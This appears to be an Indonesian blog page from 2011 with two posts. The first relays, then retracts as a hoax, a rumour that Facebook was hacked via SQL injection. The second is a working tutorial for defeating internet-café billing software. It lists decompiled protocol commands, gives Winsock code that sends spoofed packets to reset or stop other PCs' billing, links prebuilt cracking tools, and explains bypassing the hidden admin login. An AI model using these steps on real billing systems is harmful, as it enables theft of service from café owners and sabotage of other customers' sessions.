Senin, 10 Januari 2011

FACEBOOK DI HACK oleh HACKER INDONESIA

Kaget juga sih habis baca berita di kaskus tentang Facebook di Hack oleh Hacker Indonesia, saya sendiri belum bisa mastikan apa benar Facebook benar-benar bisa di tembus apalagi oleh Hacker Indonesia.
Setelah saya coba cari informasi dari Hacker nya langsung via blog pribadinya, disebutkan bahwa Facebook di tembus melalui teknik lama yaitu SQL Injection dan FQL (Facebook Query Language).
Berikut kutipannya
Mungkin anda semua mengenal aplikasi yang mungkin menjadi idola di beberapa negara, termasuk di indonesia. Tapi tahukah kalian, website sebesar Facebook pun masih berkemungkinan untuk diserang.
Saya sebelumnya pernah mendengar bahwa facebook menjadi target utama para hacker. Ribuan orang melakukan aktivitas berbahaya dengan facebook. Nah kali ini, saya bakal sedikit membongkar kira – kira metode apa yang digunakan untuk dapat membuat semua itu “Possible”.
Aplikasi facebook seperti “Mafia Wars, Poker, Farm File, Speed Racer, dll” adalah sebuah kelemahan yang mungkin dapat menyebabkan serangan fatal kepada facebook itu sendiri. Facebook membuat sebuah API untuk dapat digunakan para developer facebook.
Ada salah seorang temen saya yang berasal dari nigeria, mengatakan “saya telah berhasil mencuri lebih dari 100 ribu email dari facebook”. Nah dari berita yang dipantau beberapa waktu lalu, salah seorang Tim ahli Arjun Banker mengatakan Facebook Platform awalnya digunakan agar developer dan para pengguna dapat berkomunikasi.
Memang tidak semua orang jahat, tapi pasti ada sebagian orang yang menggunakan kesempatan tersebut untuk keuntungan pribadi. Misalnya spammer, mereka mengkopi ribuan email pengguna facebook dan melakukan aksinya. Hanya dalam beberapa waktu, beberapa email dari pengguna facebook akan langsung terkopi kedalam database nya.
SQLinjection menjanjikan untuk melakukan penyerangan dan juga, jika aplikasi facebook memiliki kelemahan Cross-site Scripting atau yang dikenal dengan XSS, hal ini dapat memudahkan para hacker untuk melakukan penyerangan kepada Facebook melalui FQL (Facebook Query Language)”.
Nah, mungkin karena alasan ini kenapa di beberapa negara lain tidak suka dengan social networking seperti facebook Karena mereka pikir ini dapat menjadi malapetaka bagi mereka. Saya menemukan beberapa orang dari beberapa negara yang mengatakan hal yang sama, terutama orang – orang dari inggris, jika kalian tanya “Apakah kamu punya akun Facebook?” pasti dia akan menjawabnya seperti yang telah dijelaskan. Jadi buat para facebook lover, berhati – hati lah dalam berkomunikasi via Facebook.
Berikut scrennshot Facebook yang di hack
facebook 
hacked
Saya sendiri belum bisa pastikan apakah gambar2 diatas olahan sotosop apa bukan, saya juga cari informasi di Situs Facebook belum ada berita tentang Facebook telah di Hack oleh Hacker Indonesia.
Bagaimana Menurut teman-teman, Asli apa Hoax doank nih ?
Update : Ternyata hanya HOAX teman-teman
Ternyata  ini cuma pengen cari sensasi dan cari nama saja, hehehhehe
Saya juga nggak kepikiran tadi ngeliat screenshot gambar di mozila diatas, ternyata gampang buktikan bahwa bener apa nggaknya.
Seharusnya kalo dimozilla link HTTPS address barnya jadi warna kuning atau warna hijau
Ketahuan sudah sekarang bahwa berita Facebook di Hack ternyata HOAX hehehehehe

Sabtu, 08 Januari 2011

Ngerjain Warnet... Hack biLLing tanpa Software!!!

Ngerjain Warnet... Hack biLLing tanpa Software!!!


PERTAMA – TAMA SAYA INGIN MEMBERI TAHU BAHWA INI HANYA SEMATA – MATA HANYA UNTUK KEPENTINGAN ILMIAH SAJA JADI DIBUTUHKAN HATI NURANI ANDA.
Untuk mencoba artikel ini, anda bisa mendownload program billing explorer demo di situs http://www.billingexplorer.com
- Server Side
- Client Side
Saya asumsikan bahwa anda sudah mendowload dan menginstall di lokal komputer.
Kali ini kita coba dilokal terlebih dahulu, sebelum kita pergi ke warnet untuk melakukan percobaan artikel ini

Pengiriman data dari Client keserver biasanya diawali dengan kata kunci:
XX2
sedangkan pengiriman data dari Server ke client selalu diawali dengan kata kunci :
YA6
Nah pasti diantara pembaca bertanya2, gimana caranya mendapatkan nilai2 tersebut?..bingung kan?….sebetulnya sih gampang aja, kita gunakan program paket sniffer untuk melihat paket data yang masuk dan paket data yang keluar.
kalo mau coba-coba bisa menggunakan program ‘ether detect packet sniffer’ di www.etherdetect.com
ok, kita balik lagi ke pembahasan kita…..
ada beberapa perintah yang dikirim oleh client ke server, seperti:
Client Command
——————
$ablock$
$ablock2$
$act$
$ajblock$
$cekc$
$cektime$
$con$
$con1$
$con1dis$
$data$
$dina2$
$gpass$
$group$
$hblock$
$infod_0$
$infod_1$
$infod2$
$infod3$
$infod32$
$infod4$
$infouser$
$member$
$movecek$
$okmove2$
$paket$
$passA$
$pelajar$
$personal$
$rental$
$ruser$
$ruserh$
$send$
$sendcc$
$okmove1$
$tutup$
perintah-perintah tersebut saya dapatkan berdasarkan hasil decompiler program dengan menggunakan software vbLite & W32Dasm.
Setelah kita mengetahui beberapa perintah diatas, kita bisa mencoba langsung dengan menggunakan perintah-perintah tersebut.
kita gunakan komponen winsock untuk melakukan koneksi ke server, biasanya program B-Exp menggunakan port 1500 (default)
jadi kita bisa menuliskan syntax berikut:
Winsock1.Connect “192.168.0.1″,1500
artinya kita akan melakukan koneksi ke 192.168.0.1 dengan port 1500.
setelah anda berhasil terhubung keserver yang anda harus lakukan adalah mengirim inisialisasi paket data, agar program tersebut menerima permintaan kita.
adapun data yang dikirim adalah:
XX2$dina2$$$
diisi dengan pc yang akan kita gunakan sebagai inisialisasi koneksi.
contoh:
Winsock1.sendData “XX2$dina2$1$budak baonk$”
(artinya: kita melakukan koneksi sebagai komputer no 1 dengan nama budak baonk)
kalo pengiriman data berhasil, maka program B-Exp server akan mengirimkan data
“YA6$/connn$” yang artinya kita sudah terkoneksi ke billing dan program billing sudah siap menerima perintah2 yang dilakukan oleh program client.
Selanjutnya untuk memulai perhitungan billing kita bisa menggunakan dengan perintah: XX2$con$2
Winsock1.SendData “XX2$con$1″
Perintah diatas juga bisa digunakan untuk mereset durasi/lama penggunaan billing.
jadi kalo anda udah pake selama 10 jam bisa balik lagi ke 0 jam dengan perintah tersebut
Nah selanjutnya untuk memberhentikan penggunaan billing kita bisa lakukan dengan mengirim perintah: XX2$web2$1$Hacker
Winsock1.SenData “XX2$web2$1$budak baong”
perintah diatas bertujuan untuk menghentikan penghitungan billing pada no Pc 1 dengan nama budak baong. jadi kita bisa menghentikan selain pc yg kita pake, dengan merubah no pc.
gampang kan, so….kalian bisa coba-coba dengan perintah-perintah lainnya…kalo masih tetep bingung cara bikin programnya….hmm.mm…..jangan khawatir aku dah bikin programnya, jadi tinggal pake aja coy…
Download Sock B-Exp flooder : http://www.vbbego.com/files/billEX.rar
—-
Cara Kedua
Untuk artikel selanjutnya penulis akan mencoba kembali memperlihatkan bagaimana
menggunakan Billing Explorer Client dengan login Admin.
Biasanya untuk login dengn jenis admin perhitungan billing otomatis tidak
berjalan (disable) untuk memulainya anda harus mendownload terlebih dahulu tool
yang sudah dibuat:
Download hack-Bexp : http://www.vbbego.com/files/hackbillEX.rar
Setelah selesai download toolsnya, kita bisa langsung mencobanya.
ada beberapa langkah yang harus anda ikuti:
Anda login terlebih dahulu ke program billing spt biasa, dengan memilih jenis personal dengan nama login “baong”
Setelah login maka secara otomatis program billing akan bekerja seperti biasa untuk menghitung lama penggunaan internet. Selanjutnya kita bisa jalankan tools yang tadi kita download untuk memulai melihat-lihat ada apa dibalik program B-Exp (billing explorer).
Secara otomatis program akan mencari apakah program billing berjalan di komputer atau tidak, dengan mencari caption id “????A?|A?” , apabila tidak ada maka program akan langsung keluar dan proses akan berhenti.
Apabila program billing ditemukan maka, program tersebut akan merubah parrent dari program billing explorer ke program “Hack B-Exp”,program billing sekarang sudah
terperangkap didalam “hack b-exp” selain itu anda bisa lihat daftar HWND ID yang terdapat pada listbox, dimana kita bisa menampilkan objek-objek yang tersembunyi.
Biasanya kalo kita mengklik tombol Admin maka program Billing menyuruh kita memasukan password, tapi jangan khawatir…itu sangat mudah untuk dilewati.
ada yg tau gimana caranya……..pasti belum donk….
nah untuk masuk ke menu setting admin yang perlu kita lakukan adalah mencari kata #root:Administrator pada daftar handle windows.
ya kalo udah gini terserah anda, mau login gratis tinggal klik tombol Login, atau merubah setting lainnya ya bebas aja. Jadi silahkan coba klik item-item yang ada pada daftar handle window dan lihat apa yang tersembunyi di program billing tersebut.
Ternyata tidak sulit juga kan, kenapa demikian……he…he… semua ini
disebabkan pembutan setting dan login digabungkan dalam satu form dengan hanya memainkan properti VISIBLE…dan ini membuat mudah untuk ditampilkan kembali.
Mudah-mudahan artikel ini dapat mejadi bekal anda dalam membuat program, dan mengambil sedikit pelajaran sehingga tidak terjadi di setiap program yang kita buat

Template by : kendhin x-template.blogspot.com